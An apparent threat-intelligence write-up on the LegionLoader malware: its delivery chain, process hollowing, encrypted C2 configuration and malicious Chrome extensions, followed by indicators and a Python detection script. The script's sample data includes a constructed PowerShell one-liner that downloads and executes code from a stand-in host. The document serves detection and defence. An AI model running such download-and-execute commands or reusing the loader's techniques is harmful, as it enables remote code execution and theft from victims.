LegionLoader, a C/C++ downloader malware, first emerged in 2019 and has been actively evolving by employing various tactics, including delivering malicious Chrome extensions that manipulate emails, monitor browsing, and even transform compromised browsers into HTTP proxies.
These extensions can also capture screenshots and interact with financial accounts on platforms like Facebook, Coinbase, and Google Pay. Recently, it has expanded its arsenal by delivering stealers alongside extensions like LummaC2, Rhadamanthys, and StealC.
It spreads primarily through drive-by downloads, luring victims to websites hosting fake installers, ultimately leading to payload delivery via RapidShare, which redirects to MEGA.
The MSI file sends the date, time, and language information to a server to retrieve a password, which is used to decrypt a ZIP archive containing a malicious DLL file.
The DLL file is side-loaded into a legitimate process (explorer.exe) using the process hollowing injection technique, while the RC4 key for decryption is derived from a combination of constants, a registry key value, and a CRC32 hash.
LegionLoader is a malicious program that connects to a command-and-control server (C2) to download configuration, which is Base64-encoded and RC4-encrypted with a known key.
It uses a Mersenne Twister random number generator to generate a random string to be appended to the GET request sent to the C2 server.
The decoded PowerShell command downloads a malicious Chrome extension from a specific URL, which can alter email content, steal cryptocurrency funds, capture screenshots of Chrome tabs, and collect system information.
The attackers use obfuscated PowerShell scripts to evade detection and establish persistence on the system.
The loader first retrieves an encrypted file from the C2 server, where the filename of the downloaded file is generated using the Mersenne Twister algorithm and has a .dat extension.
Then, the loader decrypts the file, and if the decrypted file is an executable, it is renamed to svchost.exe and placed in a subfolder under %TEMP%. If it is a DLL, rundll32.exe is used to execute the file, while if it is a batch file, the ShellExecuteA function is used to launch the file.
According to Trac-Labs, LegionLoader is a malware loader that fetches configuration files from hardcoded C2 servers and uses them to download next-stage payloads. It can also send data to secondary C2 servers to report on task execution results.
The configuration files contain shellcode encrypted with XTEA, which decrypts the next-stage payloads. In some cases, the next-stage payloads are PowerShell commands.
To mitigate potential threats, users should monitor for several key indicators, which include suspicious HTTP GET requests to specific URLs, the presence of unexpected svchost.exe files in the TEMP folder, and the dropping of ZIP and MSI files with specific naming conventions in the Downloads folder.
They should scrutinize outbound network connections from the explorer.exe and Chrome processes, paying close attention to suspicious IPs and connections to crypto domains.
They should also analyze PowerShell activity for Base64-encoded commands and check the relevant AppData locations for a malicious Chrome extension named “Save to Google Drive”.
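As an added example (not code from the write-up or from Trac-Labs), the following Python script applies the indicators listed above to constructed sample telemetry. The event line format, the crypto-domain watchlist and every path, IP and hostname in it are assumptions chosen for illustration.

```python
import base64
import re
# Constructed PowerShell one-liner, encoded the way -EncodedCommand expects (UTF-16LE, then Base64).
PS_PLAIN = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/ext')"
PS_ENC = base64.b64encode(PS_PLAIN.encode("utf-16le")).decode()
# Constructed sample telemetry, one event per line (type | process or path | details);
# illustrative values only, not indicators taken from a real LegionLoader sample.
SAMPLE_EVENTS = f"""\
file_create | C:\\Users\\bob\\AppData\\Local\\Temp\\k3f\\svchost.exe | size=412672
file_create | C:\\Windows\\System32\\svchost.exe | size=55320
process_start | powershell.exe | -NoP -W Hidden -EncodedCommand {PS_ENC}
net_connect | explorer.exe | 203.0.113.10:443
net_connect | chrome.exe | wallet.example-crypto.invalid:443
net_connect | chrome.exe | www.example.org:443
file_create | C:\\Users\\bob\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\abcdefgh\\manifest.json | name=Save to Google Drive
"""
# Constructed watchlist standing in for the crypto domains an analyst would maintain.
CRYPTO_WATCHLIST = ("example-crypto.invalid",)

def decode_encoded_command(args):
    """Decode a PowerShell -EncodedCommand (also -enc/-ec/-e) argument; None if absent or malformed."""
    m = re.search(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", args, re.IGNORECASE)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def scan_events(text):
    """Apply the indicators from the write-up to each event; return (rule, evidence) hits."""
    hits = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split("|", 2)]
        if len(parts) != 3:
            continue  # skip blank or malformed lines
        kind, subject, details = parts
        low = subject.lower()
        if kind == "file_create" and low.endswith("\\svchost.exe") and "\\temp\\" in low:
            hits.append(("svchost_in_temp", subject))  # svchost.exe never belongs under %TEMP%
        elif kind == "process_start" and low == "powershell.exe":
            decoded = decode_encoded_command(details)
            if decoded is not None:
                hits.append(("encoded_powershell", decoded))  # analyst reviews the decoded text
        elif kind == "net_connect" and low == "explorer.exe":
            hits.append(("explorer_outbound", details))  # hollowed explorer.exe is what talks to C2
        elif kind == "net_connect" and low == "chrome.exe":
            host = details.rsplit(":", 1)[0]
            if any(host == d or host.endswith("." + d) for d in CRYPTO_WATCHLIST):
                hits.append(("chrome_crypto_domain", details))
        elif kind == "file_create" and "\\appdata\\" in low and "\\extensions\\" in low \
                and "save to google drive" in details.lower():
            hits.append(("suspicious_extension", subject))
    return hits
```

Run against the sample, the scan returns one hit per indicator category and leaves the legitimate System32 svchost.exe and the ordinary Chrome connection unflagged.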